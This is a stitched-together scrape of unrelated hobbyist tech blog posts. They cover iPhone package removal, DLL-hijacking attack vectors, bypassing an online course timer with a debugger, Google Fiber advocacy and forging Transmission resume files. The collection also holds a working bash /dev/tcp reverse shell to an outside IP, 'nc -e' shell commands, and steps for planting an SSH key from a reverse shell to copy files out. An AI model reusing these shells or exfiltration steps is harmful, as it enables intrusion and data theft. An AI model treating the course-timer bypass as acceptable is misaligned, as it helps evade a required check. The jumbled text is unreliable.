You don’t need the .deb file to uninstall it.
Step 1. Make sure cydia is closed (I just killed it completely)
Step 2. Use SSH to get a shell on your phone, login as root (Password is alpine)
Step 3. Type “dpkg –get-selections” and look for the app you want to remove” You can type ”dpkg –get-selections | grep wifi” or something relating to the app to try to trim down the list.
Step 4. In my case I was trying to remove wifi sync and this is what I got.
“iPhone:/ root# dpkg –get-selections | grep wi
com.ghughes.wifisync install ”
Step 5. Type “dpkg –remove com.ghughes.wifisync”
Step 6. Yay it is gone now, restart your phone and enjoy it.
]]>I won’t go into minor details about this issue, as they can be found in reference links at the bottom of this article. I recommend reading them first if you don’t know what Dll Hijacking is. Basically, it works by creating a custom malicious dll and putting it in the same directory of a clean file. When this clean file is opened by a vulnerable application, your custom dll will be loaded and your code executed. This malicious dll must have specific filenames for each vulnerable application
, which can be discovered using any simple debugging tool.
There are vulnerabilities in many major programs, so it’s possible to bundle a dll with almost any filetype, like pdf, html, jpg, mp3, avi, ANYTHING. Even some programs included with Windows are vulnerable. Peter Eeckhoute from corelan team started an unofficial list that you might want to check. You’re almost certainly using many exploitable applications so it’s a must to check there if you use Windows regardless of it’s version or edition.
This is a major security issue that affects every Windows version and cannot be patched universally as it would break many existing applications. Inside this article I’ll also provide some tips about how you can try to protect yourself and your network. There’s no bullet-proof solution at this moment but you can certainly avoid getting exploited in many cases.
This article is focused on showing how this flaw can be exploited in a real world scenario from an attacker’s side. This is important because there are many possible attack vectors that can be used either making use of another vulnerability or even some simple social engineering. I’ll explain some of them and how can be possibly avoided by an user or sysadmin.
- Using a SMB/WebDav shared folder
This is perhaps the most common way dll hijacking is being used, probably because it can be exploited remotely. There are already a module for Metasploit which uses this vector. It works by putting together a malicious dll and a clean file that triggers it inside a share and then making your target open this clean file. Remember a shared folder link always starts with double slashes like \\200.123.123.12.
Real world examples:
- Attacker sends a shared folder link to a victim. Victim opens and sees some .html files and double-clicks one of them. When a vulnerable browser or application opens this file it loads a dll directly from this share, and victim is now infected.
- Attacker posts a link in a forum that looks like a http link but redirects victim to a shared folder. Victim opens a simple .pdf file and gets infected.
- Attacker gains access to a trusty website and puts iframes or redirects to his share. Victim trusts this site and opens a mp3 file inside the shared folder and… gets infected as well.
- Attacker uses the .lnk bug or any browser vulnerability together with any of above examples and thus increase his infect rate.
Tip: This kind of attack can be neutralized blocking any outbound connection to a smb/webdav share. Ports are 445 and 135.
- A compressed package (.zip, .tar.gz, .rar etc)
This vector can be exploited by putting together a bunch of clean files and a malicious dll inside a compressed folder/package. Target will extract these files and open one of them, getting attacker’s dll loaded.
Real world example:
- Attacker compresses 30 jpg pictures and a dll in a zip file. Victim extracts everything to a folder and double-clicks one of the pictures. Infected.
I won’t provide any other example of this because it’d look the same.
Tip: Before opening any kind of file, specially downloaded from the internet, check if there’s any dll file in the same directory. Don’t forget to enable show hidden files and show all extensions on your Folder Options. It’s also recommended to move only the files you need to open to another directory created by you. This should make you safe.
- Torrents
This one is kinda nasty and can be very effective to contaminate large amounts of people. A torrent can contain large numbers of files and can be used to get a malicious dll downloaded together with clean files without being noticed. This is very dangerous, specially if a big torrent tracker or database can be compromised.
Real world examples:
- Attacker posts a custom torrent in a public tracker, which contains a pack of mp3′s and a malicious dll. Victim goes listen it’s new song album and get infected.
- Attacker gains admin access to a torrent database (this actually happened to ThePirateBay not so long ago) and changes a legitimate high-traffic torrent for a infected one. This could cause a massive infection in a matter of minutes.
Tip: Same tip as above. Make sure there are no dlls in the current folder before opening any kind of file. If you own a tracker or database make sure your webserver and/or database are not vulnerable to any kind of vulnerability like SQL injections, XSS etc.
- Exploiting multiple application hijacks
We have not seen yet a real world malware that uses dll hijacks to it’s max but one of the ways attackers can (and will) use to increase their success rate is putting multiple dlls to exploit the same filetype.
Real world example:
- Attacker shares a folder which contains a bunch of .avi files and three malicious dlls: one for VLC, other for MediaPlayer Classic and, finally, the last one for Winamp. Attacker can now exploit three apps in the same attack, increasing the chance of victim getting infected.
These are just some of the many ways we might seem this breach being exploited in real world in a very near future. You might wanna check all vulnerable apps and discover your own way or you can also try to discover your own vulnerable apps using this kit, provided by HD Moore (creator of Metasploit).
- Bruno Filipe (diwr)
Reference links:
hdm’s DLL Hijack Audition kit and instructions
Rapid7 Blog advisory about DLL Hijacking flaw
Corelan blog – Unofficial list of vulnerable apps
exploit-db list of vulnerable apps
Sample DreamWeaver CS5 exploit
and open up the first section, it says it is a 4 hour minimum class plus a test at the end, each section is timed like 15 – 30 min and you cant continue and click next until the timer runs out. Each section has questions, but it is more about the reading. Anyways, it’s bullshit and I’m not about to waste my time, so I opened up my javascript debugger.
I click stop to pause the stack and flow of execution.
I click step into repeatedly just getting an idea for the code. I see line 284 and it looks like if the timerval is 0 or less it displays the quiz (meaning I completed the section). I type timerval = 0 and hit enter, then step into. It entered that if statement, I clicked continue for the program execution. Answered the easy quiz question (getting it wrong does nothing) and clicked the now available next button at the bottom.
After using this technique to skip 4 potential hours of bullshit, I took the test. The test looked like it was graded server side and I was tired so I just took it without cheating. Even though I got crap questions like “What percent of fatal crashes involve drugs, 17%,18%, or 17.5%”, I still completed it with 92% and not reading a bit of their course.
hunnyb can be found here
http://meatballhat.com/projects/HunnyB
As for my app it is in python and the source is here.
http://pastebin.com/wscvTZBq
Here are some pictures of it in action. 
Song: http://www.youtube.com/watch?v=oUbpGmR1-QM
Background info: On his final Colby failed and asked us if the subnet mask was /63 also during labs router 7 was found to be broken.
]]>LL 1&BGT51
2fWAI!Rx*P
yKv6lP5fua
KRN320mV3A
&z%i2@eII$
- Andrew
]]>
Because of how the reverse shell in my last post works most commands don’t work if it takes multiple lines or requires a password like scp. So to fix this lets generate a rsa public and private key. Assume you only have reverse shell access you can download this code off a webserver using curl -O
#!/usr/bin/expect
spawn ssh-keygen -t rsa
expect “Enter file in which to save the key”
send “\r”
expect “Enter passphrase”
send “\r”
expect “Enter same passphrase again:”
send “\r”
expect “Your identification has”
run that as a bash script and it will generate two keys in /Users/useraname/.ssh you want the public key id_rsa.pub
In your reverse shell navigate to the directory and type “cat id_rsa.pub” and copy what it gives you. Go onto your server and find your authorized ssh hosts. On ubuntu it is “/root/.ssh/authorized_keys” so when logged onto my server I opened that file and added the data from the cat command. Now you can do “scp file.zip root@server.com:/” and it will upload the file without asking for a password and you can do it in the reverse shell. TA DA!
]]>
On linux you might of heard of using netcat on the target, it would look something like this.
“nc 127.0.0.1 8080 -e /bin/bash”
Or on windows.
“nc 127.0.0.1 8080 -e cmd.exe”
However for unknown reasons (I assume security) apple’s modified version of netcat does not have a -e flag but there is a work around using bash. I do not take credit for this I just found it with a lucky google search.
On the target computer create a file called target.sh
the file should contain some bash code.
“#!/bin/bash
exec 5<>/dev/tcp/74.125.155.104/8080
cat <&5 | while read line; do $line 2>&5 >&5; done”
next open Terminal.app navigate to the directory the file is saved and type.
“chmod +x target.sh”
“./target.sh”
Before you do all this though you should have a open connection waiting on a server. Personally I just use an ubuntu box (you may need to install netcat on your server). From a shell on your server type
“netcat -l -p 8080 -vvv”
Here is an example below. The root@freakbox is obviously the server. I also forwarded the port 8080 to my server from my router.
Google’s fiber network is greatly needed in our community. Current ISP’s provide slow speeds for high prices (bundles that don’t save you money), and poor customer service. ISP’s are setup so they have as little competition as possible, and are able to take advantage of the consumers. When a company is hated so much it needs to change its name to xfinity, drastic measures need to be taken. This is where google can intervene to provide an alternative, and much faster option to everyone else. The introduction of a new ISP with better speeds could spark some competition and maybe help out verizon and comcast get their stuff together. The community (home and school) would benefit as well, especially those with IT/Networking Fields such as the Center For Advanced Learning (CAL) that we attend.
Current services offer somewhat limited options. The higher end internet packages are mainly available only if you get them with phone and T.V – and still are pricey. Comcast (or xfinity now) also messes with customers’ bandwidth and offers quite unreliable service. As an IT consultant and someone who works with computers more than with people, I have seen comcast demonstrate some bad practices in the professional field as well; they are rather shifty and make life harder for other companies to install/fix networking setups (in houses and very expensive condominiums). In general, America has seen a very weak growth in the speed of internet that’s available to the public. This picture demonstrates that quite well http://i36.tinypic.com/293wmrb.jpg. Considering the internet was concieved in the United States, this is very depressing to view. We need google to bring us back to life (with electric paddles).
As it is already obvious the current options presented to the people of gresham are weak at best. With google trying to move to a cloud based type of system giving the people of Gresham a taste of this Ultra High-Speed Internet would be a great start to showing them what is possible. If people are happy with their internet from google, they might be interested in checking out Chrome OS or even looking into a google phone. Something that makes Gresham a great place to test out this fiber network is the education system. In the gresham are there are four highschools, one college, and a charter school The Center For Advanced Learning. All of these schools could greatly benefit from a faster connection. Not to mention freeing the residents of Gresham from the tyranny of Xfinity/Verizon, and hopefully forcing some new internet plans to be set in place.
In the past google has provided us with projects such as gmail, andriod, chrome, and of course its search engine. We hope google can impress us one more time, and provide us with its Ultra High-Speed Internet infrastructure. This will only be another addition to the line of powerful products and services google has created, and we look forward to it.
- Andrew & Tudor
EDIT: Just a great example of Comcast’s fine customer service.
Transmission is a multi platform BitTorrent client and is great in many respects for what it does. However not all applications work how you want them to. You might of noticed that if you did not quit transmission correctly or ejected your drives early (even if the torrents are paused) when you re opened the client your data would have to re-verify. If you only have a few torrents this is not a big deal but with lets say 900 torrents and TB’s of data it can take literally 4 days to re-verify data even when you know it is there. If in the case you know you just quit something out of order and that you’re sure the data was not changed there is a way around this data verifying. As a mac user I will only be explaining the mac side. I am currently working on a program to automate it but ill explain how transmission works for now. Again I do not recommend using this all the time or your client could upload data that “does not exist” you could screw people over and get banned from private trackers but here it goes.
Resume Files
Transmission stores .resume files in /Users/YOURUSERNAME/Library/Application Support/Transmission/Resume/
there is one resume file per torrent in the client these files are encoded with Bencode (BEE-Encode) they contain data like upload/download priority file location etc.. but more importantly they contain the last time modified and the data blocks verified. In a GUI bencode editor (only one exists on windows) it looks like this. However you can still read the data on a mac its just in command line with python, here.
The important info is the bitfeild and mtimes fields under the progress. mtimes is the modified time in epoch time (this is seconds passed since january 1 1970) its a unix time thing you can read about here and convert it back and forth here. What Transmission checks is that the data file’s last modified time (in epoch) and the bitfield blocks. I believe the 41 represents how many blocks there are and each ÿ = 1 block, also ÿ == 0xff and it just means that block is downloaded. On a file that will require verification the mtime will be -1 and the bitfield blocks will just be blank. Until I get my program completed I am manually doing it with the help of windows and some nifty command line commands. The steps are as follow
Steps
- Close Transmission
- Pick a eopoc time (I just have one thats a few weeks ago 1243192648)
- Find the file that needs re-veryfing (Apples touch utility makes you format the time in a [[CC]YY]MMDDhhmm[.SS] format so I downloaded gtouch, or GNU’s version of touch because it uses epoch time)
- run “gtouch -m -d @1243192648 filename.dmg” or if its a Folder with more files within it you can do this recursively with “find . -exec gtouch -m -d @1243192648 folder_name {} \;” when in the same directory in terminal of course.
- Now to modify the resume file, currently I am using BEncode Editor in windows I changed mtime from -1 to 1243192648
- Next to change bitfield, I look at the number of blocks it should have then paste ÿ into a text editor until my char count is the same (41 in this case), then I copy that into my clipboard and paste it into the bitfield. Then save the file, or move it from your windows virtual machine to your mac and replace the old one.
- Open up Transmission and the torrent should now resume without checking.
Some things to note, if its a folder with lots of files, each file will have an mtime to edit in BEncode Editor (so it can take a long time to do by hand). That is why I’m currently working on program to automate this long process. Hopefully this is helpful to someone though and now you know just a little bit more about your torrent client.
- Andrew Free
]]>